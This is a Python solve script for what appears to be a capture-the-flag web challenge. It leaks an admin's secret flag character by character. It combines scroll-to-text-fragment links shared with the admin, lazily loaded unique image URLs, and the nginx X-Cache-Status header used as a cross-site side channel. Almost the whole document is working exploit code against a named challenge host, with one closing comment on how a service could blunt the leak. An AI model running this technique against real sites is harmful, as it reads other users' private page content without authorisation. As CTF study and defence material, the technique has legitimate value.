
Using STTF (scroll-to-text-fragment) and the nginx cache-status header, we can leak the admin's flag.

#!/usr/bin/env python3
import requests
import random
import time

# Base URL of the challenge host; every request below is built on it.
target = "http://35.187.204.223"
# Dummy file sent as the upload body ("a has nothing interesting" per the
# author). It is deliberately kept open for the lifetime of the script
# because uploadImage() reuses the same handle on every post.
rfile = open("./a", mode="r")

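def uploadImage(payload):
    """Create an image entry whose img_url carries *payload* and return its page path.

    The title is a 10000-character run of 'A' plus a random marker so the
    line of the response HTML that belongs to this entry can be found again.
    The img_url points at a static image with ``?a=<payload>`` appended and
    the literal text `` loading=lazy`` after it (presumably so the rendered
    <img> ends up lazily loaded -- depends on the page template, not visible
    here).

    Args:
        payload: value placed in the ``a`` query parameter of the static
            image URL; the caller uses a fresh value per probe so the URL is
            unique.

    Returns:
        The substring between ``<a href="`` (plus one further character) and
        the two characters preceding the marker on the matching response
        line -- the author's slice of the entry's anchor href.

    Raises:
        RuntimeError: if no response line contains the marker (previously the
        function fell off the end and returned None, which made the caller
        fail later with a TypeError on string concatenation).
    """
    marker = "A" * 10000 + str(random.random()) + " IMHERE "
    # requests consumes the file object while building the form body, so a
    # second call would otherwise send nothing for img_file; rewind so every
    # upload carries the same body as the first.
    rfile.seek(0)
    img_url = f"/static/image/68fa5809a96e4870989609a6676826ba.jpg?a={payload} loading=lazy"
    html = s.post(
        f"{target}/image",
        data={"title": marker, "img_url": img_url, "img_file": rfile},
    ).text
    for line in html.split("\n"):
        if marker in line:
            # Offsets are the author's fit to the page's anchor markup:
            # skip '<a href="' plus one character, stop two characters
            # before the marker text.
            return line[line.index('<a href="') + 10 : line.index(marker) - 2]
    raise RuntimeError("upload response contained no line with the title marker")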
# One cookie-carrying session shared by the upload and share calls below.
# The throwaway credentials are just whatever the challenge login accepts;
# whether /login also registers the account is not visible from this script.
s = requests.Session()
login_form = {"username": "adsfadfadfhsdjf", "password": "adsfadfadfhsdjf"}
s.post(f"{target}/login", data=login_form)
# http://35.187.204.223/image/26233421-c4b1-4b4b-a43b-fe3770c5c071

# Known prefix of the flag; each confirmed hex digit is appended followed by '/'.
flag = "LINECTF{0/5/d/"
HEX_DIGITS = "0123456789abcdef"

# The outer loop has no exit: after a digit is confirmed the scan restarts for
# the next position, and a full scan with no HIT simply repeats. The script is
# stopped by hand once the flag is complete.
while True:
    for nibble in HEX_DIGITS:
        # Fresh 8-character token so the static-image URL probed below is
        # unique to this guess and has no pre-existing cache entry.
        token = str(random.random())[-8:]
        image_page = uploadImage("lmao" + token)
        # Share the new page with a scroll-to-text fragment for the guessed prefix.
        share_path = image_page + "#:~:text=" + flag + nibble
        share_reply = s.post(f"{target}/share", json={"path": share_path}).json()
        assert share_reply["result"] == "ok"
        # Wait for the other side to open the shared page before probing.
        time.sleep(5)
        # Probe without the session: only the cache-status header matters here.
        probe_url = f"{target}/static/image/68fa5809a96e4870989609a6676826ba.jpg?a=lmao{token}"
        cache_status = requests.get(probe_url).headers["X-Cache-Status"]
        # A HIT means this unique URL was already fetched once before this
        # request -- presumably by the viewer of the shared page, which the
        # author treats as "the text fragment matched". Defensive note: the
        # signal exists because per-request query strings get their own cache
        # entries and the cache status is surfaced to clients; a service can
        # blunt it by not caching on arbitrary query strings and by not
        # exposing the cache-status header.
        if cache_status == "HIT":
            flag += nibble + "/"
            print(flag)
            break
        print(nibble)